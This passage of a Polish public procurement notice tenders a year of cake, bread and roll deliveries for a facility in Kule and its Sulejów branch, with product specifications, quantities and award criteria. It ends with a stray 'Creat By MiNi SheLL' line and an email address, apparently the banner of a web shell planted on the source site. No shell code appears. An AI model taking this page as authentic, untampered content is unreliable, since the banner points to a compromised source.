PN-A-88106	Ciasto na bazie ciasta biszkoptowego ciemnego nasączonego ponczem ze spirytusu i rumu, przełożone kremem śmietankowo budyniowym, wykończonego herbatnikami, polane polewą czekoladową i posypane białą posypką czekoladową . wysokość ciasta  nie mniej niż 10 cm. Bez zanieczyszczeń ( piasek) i smaku stęchlizny. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.	kg	150
20	Ciasto capucinno
	15812200-5
PN-A-88106	Ciasto na bazie ciasta biszkoptowego nasączone pączem z dodatkiem kawy i przełożone kremem na bazie budyniu i serka waniliowego z dodatkiem mleka w proszku. Całość wykończona polewą  i posypkami. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.	kg	150
21	Orzechowiec
	15812200-5
PN-A-88106	Ciasto na bazie  ciasta biszkoptowego z kakao i orzechami włoskimi, przełożone 2 krotnie kremem budyniowo - śmietankowym.  Nasączone pączem z olejkiem rumowym i arakowym. Wykończone orzechami włoskimi i polewą czekoladową i białą.
Orzechy bez zanieczyszczeń ( skorupek) i zapachu stęchlizny.  Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	100
22	Ciasto rafaello
	15812200-5
PN-A-88106	Ciasto biszkoptowe przełożone kremem budyniowym , dolna warstwa posmarowana masą jagodową, wykończone  masą  kokosową.  Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	150
23	Cynamonowiec
	15812200-5
PN-A-88106	Ciasto piernikowe z dodatkiem cynamonu, jabłek, bakalii  i orzechów. Posypane cukrem pudrem.  Niedopuszczalne: grudki surowców, zakalec, ciasto połamane, popękane, przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy. 	kg	100
24	Ciasto bakaliowe z kokosem
	15812200-5
PN-A-88106	Ciasto biszkoptowo- piernikowe przełożone warstwą kokosu i kremem czekoladowym. Całość wykończona polewą czekoladową z rodzynkami. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	150
25	Babka czekoladowo - kokosowa
	15812200-5
PN-A-88106	Wyrób z ciasta biszkoptowo- tłuszczowego z dodatkiem kakao i  masy kokosowej. W przekroju widoczne  białe skupiska  masy kokosowej. Wykończone pomadą białą,  posypane kokosem
Niedopuszczalne : zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	80
26	Ciasteczka 

	15812200-5
PN-A-88106	Ciasteczka kokoski  i kruche . 1. Wyrób otrzymany z połączenia masy kokosowej na bazie białka i skrobi ziemniaczanej o kształcie gwiazdek o średnicy ok. 5 cm. 2. Wyrób z ciasta kruchego  z dodatkiem marmolady. Barwa jasnozłocista. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	80
27	Ciasto kawowe
	15812200-5
PN-A-88106	Ciasto na bazie ciasta biszkoptowego ( ciemnego i jasnego z makiem), nasączone pączem z dodatkiem spirytusu. Przełożone kremem na bazie masła i margaryny z dodatkiem spirytusu i kawy.  Całość wykończona posypaną kawą. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	150
28	Ciasto  Bajadera
	15812200-5
PN-A-88106	Ciasto na bazie ciasta biszkoptowego przełożonego masą prażonych jabłek z dodatkiem galaretki i pianki. Całość wykończona i posypana cukrem pudrem. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	150
29	Ciasto kruche z owocami
	15812200-5
PN-A-88106	Wyrób otrzymany z połączenia korpusu z ciasta  kruchego o grubości ok.2 cm i  masy owoców sezonowych ( np. śliwka, truskawka, lub mieszanka z różnych owoców) o grubości ok. 3 cm. Posypany kruszonką i cukrem pudrem. Wypiekany na blachach o wielkości 40-60 cm. Kształt nadany formą. Barwa złocista do jasnobrązowej. 
Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone,twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	100
30	Ciasto Biedronka
	15812200-5
PN-A-88106	Ciasto piernikowo - czekoladowe przełożone pianką wiśniową z dodatkiem wiśni. Całość wykończona galaretką wiśniową.  Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	150
31	Szarlotka miodowa
	15812200-5
PN-A-88106	Ciasto biszkoptowe z dodatkiem miodu, przełożone kremem budyniowo- śmietankowym  wymieszane z prażonymi jabłkami. Całość posypana cukrem pudrem i cynamonem.
Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy.  	kg	100
32	Piernik
	15812200-5
PN-A-88106	Wyrób otrzymany z ciasta piernikowego przełożony marmoladą, wykończony polewą kakaową.  Wykończony  posypkami. Kształt nadany formą dł 35 x 12 x 7 cm o charakterystycznym podłużnym pęknięciu. Barwa jasnobrązowa do ciemnobrązowej, struktura średnio porowata. Nie dopuszczalne występowanie zakalca i ciemniejszych smug. Warstwa polewy ściśle połączona z miękiszem. Smak i zapach charakterystyczny do użytych składników.	kg	100
33	Chleb baltonowski 	15811100-7   
PN-93/A-74103	Kształt prostokątny, o wadze 1 kg -1,20 kg, wypiekany w formach .
Produkowany na naturalnym kwasie, maka żytnia 30 % , mąka pszenna 70 %, fermentujący, posypany makiem.  Skórka lekko chropowata i błyszcząca jasnobrązowa. Niedopuszczalny : Chleb  kwaśny ,kruszący się, niedopieczony bez zakalca. Niedopuszczalny smak stęchły lub inny obcy. Chleb krojony pakowany w worki foliowe (worki foliowe bez uszkodzeń mechanicznych ) .Produkt nie może zawierać polepszaczy.	kg	3 500
34	Chleb firmowy ze słonecznikiem
	15811100-7 
  PN-93/A-74103	Bochenki prostokątne o wadze 500g do 800g  wypiekane z mąki żytniej i mąki pszennej  z dodatkiem ekstraktu słodu jęczmiennego. Chleb wypieczony na przekroju widoczne nasiona słoneczniku. 
Niedopuszczalny smak stęchły lub inny obcy. Chleb krojony pakowany w worki foliowe (worki foliowe bez uszkodzeń mechanicznych ) .Produkt nie może zawierać polepszaczy.	kg	1 000
35	Bułka- baton 	15811400-0   
PN-92/A- 74105	Kształt podłużny o wadze 350- 500g. Kolor jasno złoty w przekroju jednolity.
Niedopuszczalny : Baton  kwaśny ,kruszący się, niedopieczony. Niedopuszczalny smak stęchły lub inny obcy. Produkt nie może zawierać polepszaczy. 	kg	20
36	Buła słodka
	15811400-0   
PN-92/A- 74105	Różne kształty o wadze  nie mniej niż 90g., Kolor jasno złoty, posypana cukrem pudrem lub wykończona pomadą. Nadzienie : ser biały, marmolada, mak, budyń, jabłka.
Niedopuszczalny smak stęchły lub inny obcy. Produkt nie może zawierać polepszaczy. Niedopuszczalna: Bułka twarda, lub niedopieczona.	szt.	3 000
37	Bułka pszenna zwykła 	15811400-0   
PN-92/A- 74105	Bułka pszenna  zawierająca  śladowe ilości mąki żytniej.   Waga 1 szt  nie mniej niż 50 g , kształt okrągły, jasna skórka posypana makiem, lub sezamem. Niedopuszczalny smak stęchły lub inny obcy. Produkt nie może zawierać polepszaczy. Niedopuszczalna: Bułka twarda, lub niedopieczona.	szt.	16 000
38	Bułka do hot-dogów 	15811400-0   
PN-92/A-74105	Kształt podłużny o wadze  90-100g/szt. Niedopuszczalny smak stęchły lub inny obcy. Produkt nie może zawierać polepszaczy. Niedopuszczalna: Bułka  niedopieczona, lub twarda.	szt.	1 000
39	Rogale
	15811200-8
PN-92/A-74105	Wyrób otrzymany z ciasta drożdżowego wypiekany na blachach. Kształt półkolisty, walcowaty o końcach zwężonych z widocznymi na powierzchni warstwami zwiniętego ciasta. Kolor jasnozłoty. Wykończone posypany makiem, sezamem lub kruszonką. Waga wyrobu gotowego  nie mniej niż 90 g	szt.	3 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.22.00-5, 15.81.10.00-6, 15.81.11.00-7, 15.81.14.00-0, 15.81.12.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Najkrótszy czas realizacji wymiany wadliwego towaru - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy ciast i pieczywa dla OSSW w Kulach  Oddział Zamiejscowy w Sulejowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa artykułu	Kod CPV	Opis przedmiotu zamówienia	j.m.	Ilość
1	Chleb pszenno-żytni duży	  15811100-7	Pieczywo spożywcze produkowane 
z mąki pszennej i żytniej, na kwasie, z dodatkiem drożdży lub na drożdżach, z dodatkiem soli; struktura i konsystencja: podłużny, skórka gładka lub lekko chropowata, błyszcząca; miękisz: suchy w dotyku, krojony; zapach aromatyczny, swoisty dla rodzaju chleba; waga do 1100 g. Chleb krojony pakowany w worki foliowe. Przydatność do spożycia: chleb krojony, świeży tj. wyprodukowany w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	2420
2	Chleb żytni pełnoziarnisty	15811100-7	Pieczywo spożywcze produkowane z mąki żytniej razowej, na kwasie, z dodatkiem drożdży, soli, ekstraktu słodowego i ziaren zbóż; struktura
 i konsystencja: w kształcie podłużnej foremki, skórka gładka lub lekko chropowata, błyszcząca; miękisz: równomiernie zabarwiony, suchy w dotyku, krojony; zapach aromatyczny, swoisty  dla rodzaju chleba; waga do 400 g. Chleb krojony pakowany w worki foliowe. Przydatność do spożycia: chleb krojony, świeży tj. wyprodukowany w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	600
3	Chleb słonecznikowy	15811100-7	Pieczywo spożywcze produkowane 
z mąki pszennej, na kwasie, z dodatkiem drożdży, soli, ekstraktu słodowego i ziaren słonecznika; struktura i konsystencja:  kształt okrągły, skórka gładka lub lekko chropowata, błyszcząca; miękisz: równomiernie zabarwiony, suchy w dotyku, krojony; zapach aromatyczny, swoisty  dla rodzaju chleba; waga do 450 g.Chleb krojony pakowany w worki foliowe. Przydatność do spożycia: chleb krojony, świeży tj. wyprodukowany w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	585
4	Chleb razowy	15811100-7 	Pieczywo spożywcze produkowane z mąki razowej, na kwasie, z dodatkiem drożdży, soli, ekstraktu słodowego i ziaren zbóż; struktura
 i konsystencja: w kształcie podłużnej foremki, skórka gładka lub lekko chropowata, błyszcząca; miękisz: równomiernie zabarwiony, suchy w dotyku, krojony; zapach aromatyczny, swoisty  dla rodzaju chleba; waga do 400 g. Chleb krojony pakowany w worki foliowe. Przydatność do spożycia: chleb krojony, świeży tj. wyprodukowany w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	600
5	Kanapka angielka	15811000-6	 Bułka pszenna, podłużna o długości około 30 cm, kształtem i wielkością zbliżona do bochenka chleba. Skład: mąka pszenna typu 500, 
    drożdże, cukier, sól, olej słonecznikowy, letnia woda, 
Waga 300 g. Kanapka krojona pakowana w worki foliowe. Przydatność do spożycia: Kanapka krojona, świeża tj. wyprodukowana w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	30
6	Bułka pszenna zwykła	15811400-0	 Pieczywo spożywcze pszenne, produkowane z mąki pszennej, z dodatkiem drożdży lub na drożdżach, z dodatkiem soli, ekstraktu słodowego; struktura i konsystencja: okrągła z poprzecznym podziałem, skórka gładka, błyszcząca, lekko chropowata w miejscu podziału; barwa skórki: złocista do jasności brązowej; miękisz: równomiernie zabarwiony, suchy w dotyku, o dobrej krajalności, sprężysty, równomiernie porowaty, smak i zapach: aromatyczny, swoisty dla tego rodzaju bułek; średnia waga w partii ok.100 g. Przydatność do spożycia: bułka świeża tj. wyprodukowana w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	700
7	Bułka włoska	15811400-0	 Pieczywo spożywcze pszenne z mąki pszennej, z dodatkiem drożdży lub na drożdżach, z dodatkiem soli, ekstraktu słodowego, cukru, oliwy z oliwek i mieszanki ziół; struktura i konsystencja: podłóżna zawijana, skórka gładka, błyszcząca, lekko chropowata w miejscu podziału; barwa skórki: złocista do jasnobrązowej; miękisz: równomiernie zabarwiony, suchy w dotyku, o dobrej krajalności, sprężysty, równomiernie porowaty; smak i zapach: aromatyczny, swoisty dla tego rodzaju bułek; średnia waga w partii 80 g. Przydatność do spożycia: bułka świeża tj. wyprodukowana w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	200
8	Bułka graham	15811400-0	 Pieczywo spożywcze mieszane, produkowane z mąki graham z dodatkiem drożdży lub na drożdżach, z dodatkiem soli: struktura i konsystencja: podłużna, skórka chropowata z widocznymi ziarnami; barwa skórki:  jasnobrązowa do ciemnobrązowej; miękisz: równomiernie zabarwiony, suchy w dotyku, o dobrej krajalności, równomiernie porowaty; smak i zapach: aromatyczny, swoisty dla tego rodzaju bułek; średnia waga w partii ok. 80 g. Przydatność do spożycia: bułka świeża tj. wyprodukowana w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	200
9	Bułka kajzerka	15811400-0 	Pieczywo spożywcze pszenne z mąki pszennej, z dodatkiem drożdży lub na drożdżach, z dodatkiem soli, ekstraktu słodowego, cukru, tłuszczu; struktura i konsystencja: okrągła z podziałem na krzyż, skórka gładka, błyszcząca, lekko chropowata w miejscu podziału; barwa skórki: złocista do jasnobrązowej; miękisz: równomiernie zabarwiony, suchy w dotyku, o dobrej krajalności, sprężysty, równomiernie porowaty; smak i zapach: aromatyczny, swoisty dla tego rodzaju bułek; średnia waga w partii  ok. 50 g. Przydatność do spożycia: bułka świeża tj. wyprodukowana w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	500
10	Bułka tarta	15800000-6 	Produkt otrzymany przez rozdrobnienie wysuszonego pieczywa pszennego, bez dodatku nasion, nadzień i zdobień; struktura i konsystencja: sypka, bez grudek o barwie jasnożółtej; smak i zapach charakterystyczny dla suszonego pieczywa; opakowanie: torba papierowa; waga ok. 500 g. Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy.	kg	100
11	Pączek drożdżowy	15812000-3	 Pieczywo spożywcze produkowane z mąki pszennej na drożdżach, z dodatkiem soli, cukru, jaj, tłuszczu, z nadzieniem z powideł, kremu budyniowego lub tofi nie mniej niż 20% masy pączka; wykończony glazurą lu cukrem podrem, kształt: okrągły, barwa skórki jasnobrązowa; miękisz: suchy w dotyku, o dobrej krajalności, sprężysty, równomiernie porowaty i wyrośnięty; średnia waga w partii ok.100 g. Przydatność do spożycia: ciastko świeże tj. wyprodukowane w dniu dostawy o terminie przydatności do spożycia nie krótszym niż 1 dzień.	kg	150
12	Drożdżówka z nadzieniem	15812000-3	 Pieczywo spożywcze produkowane z mąki pszennej na drożdżach, z dodatkiem soli, cukru, jaj, tłuszczu i innych dodatków smakowych, z nadzieniem nie mniej niż 40 g lub kruszonką min. 20% masy drożdżówki; kształt okrągły lub podłużny, barwa skórki: złocista do jasnobrązowej, miękisz: suchy w dotyku, o dobrej krajalności, sprężysty, równomiernie porowaty, wyrośnięty; średnia waga w partii 100 g.Przydatność do spożycia: ciastko świeże tj. wyprodukowane w dniu dostawy o terminie przydatności do spożycia nie krótszym niż 1 dzień. 	kg	350
13	Jagodnik	15812000-3	 Pieczywo spożywcze produkowane z mąki pszennej na drożdżach, z dodatkiem soli, cukru, jaj, tłuszczu i innych dodatków smakowych, z nadzieniem ze świeżych jagód nie mniej niż 40 g; kształt okrągły lub podłużny, barwa skórki: złocista do jasnobrązowej, miękisz: suchy w dotyku, o dobrej krajalności, sprężysty, równomiernie porowaty, wyrośnięty; średnia waga w partii 100 g. Przydatność do spożycia: ciastko świeże tj. wyprodukowane w dniu dostawy o terminie przydatności do spożycia nie krótszym niż 1 dzień.	kg	80
14	Rurka z kremem	15812100-4	 Wyrób z ciasta francuskiego, po upieczeniu odznacza się charakterystycznym listkowaniem; nadzienie: krem budyniowy nie mniej niż 40% ciasta; średnia waga w partii ok. 80 g. Przydatność do spożycia: ciastko świeże tj. wyprodukowane w dniu dostawy o terminie przydatności do spożycia nie krótszym niż 1 dzień.	kg	40
15	Sernik	15812200-5 	Wyrób z ciasta kruchego, wypiekany na blachach o wielkości 40-60 cm, wysokość masy serowej 5 cm z dodatkiem kawałków brzoskwiń lub rodzynek, korpusy z ciasta kruchego do grubości 1 cm, wykończone polewą kakaową, udekorowany pomadą białą lub czekoladową. Waga ciasta 8 kg. Barwa masy serowej kremowej do jasnozłotej, jednorodna struktura masy bez oznak kruszenia, puszysta. Korpusy kruche, jasnokremowe do żółtej. Smak i zapach swoisty charakterystyczny dla użytych dodatków. Niedopuszczalny stęchły lub inny obcy. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 1 dzień.	kg	60
16	Placek drożdżowy	15812200-5 	Wyrób otrzymany z ciasta drożdżowego . Wykończony kruszonką i cukrem pudrem. Wypiekane na blachach . Kształt nadany formą, w której jest wypiekany, spulchniony drożdżami. Barwa skórki złocista do jasnobrązowej, górna powierzchnia  posypana cukrem pudrem. Smak i zapach właściwy dla użytych surowców i aromatów. Niedopuszczalny stęchły lub inny obcy smak. Ciasto bez śladów przypaleń. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	60
17	Babka piaskowa marmurkowa	15812200-5	 Wyrób z ciasta biszkoptowo - tłuszczowego z dodatkiem kakao lub o innych smakach np. cytrynowym, lub pomarańczowym. Kształt prostokątny o dł. 35 cm,szer.12cm,nadany formą. Posypany cukrem pudrem lub polewą kakaową. Niedopuszczalne :grudki surowców, zakalec, ciasto połamane, popękane,   przypalone, twarde, rozpadające się. Niedopuszczalny smak stęchły lub inny obcy. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 2 dni. 	kg	40
18	Wuzetka	15812200-5	 Ciasto biszkoptowe z kakao; odznacza się lekkością, puszystością, jest porowate i elastyczne, z nadzieniem z bitej śmietany 30% z cukrem pudrem, nie mniej niż 50% całego ciasta, równomiernie rozłożona na całym cieście. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 1 dzień.	kg	60
19	Ciasto miodowe	15812200-5	Ciasto kruche z miodem, przełożone kremem budyniowym i ciastem biszkoptowym, wykończone kremem budyniowym, czekoladą i orzechami włoskimi. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	30
20	Ciasto sezamowe	15812200-5	 Ciasto biszkoptowe, przełożone kremem budyniowym i krówkowym, wykończone zapieczonym sezamem. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	20
21	Ciastko francuskie	15812100-4	 Wyrób z ciasta francuskiego, odznacza się charakterystycznym listkowaniem, nadzienie: masa serowa, nie mniej niż 40% ciasta, średnia waga w partii ok. 100 g. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 2 dni.	kg	40
22	Mini ptyś	15812100-4 	Wyrób z ciasta parzonego, nadzienie: krem śmietanowo - budyniowy. Kształt okrągły, waga partii ok. 20 g. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 1 dzień.	kg	20
23	Gniazdo poznańskie	15812100-4 	Wyrób z ciasta parzonego, nadzienie: krem śmitanowy z dodatkiem brzoskwini. Kształt okrągły, waga partii ok. 100 g. Przydatność do spożycia: ciasto świeże tj. wyprodukowane w dniu dostawy o terminie przydatności nie krótszym niż 1 dzień.	kg	40
24	Mini pizza	15812121-7 	Podkład z ciasta drożdżowego, nadzienie: pieczarki, szynka, pomidory, cebula, ser żółty, kukurydza, groszek, produkt świeży tj. wyprodukowany w dniu dostawy o terminie przydatności nie krótszym niż 2 dni. waga ok. 150 g, 	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.81.11.00-7, 15.81.14.00-0, 15.80.00.00-6, 15.81.20.00-3, 15.81.21.00-4, 15.81.22.00-5, 15.81.21.21-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Najkrótszy czas realizacji wymiany wadliwego towaru - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com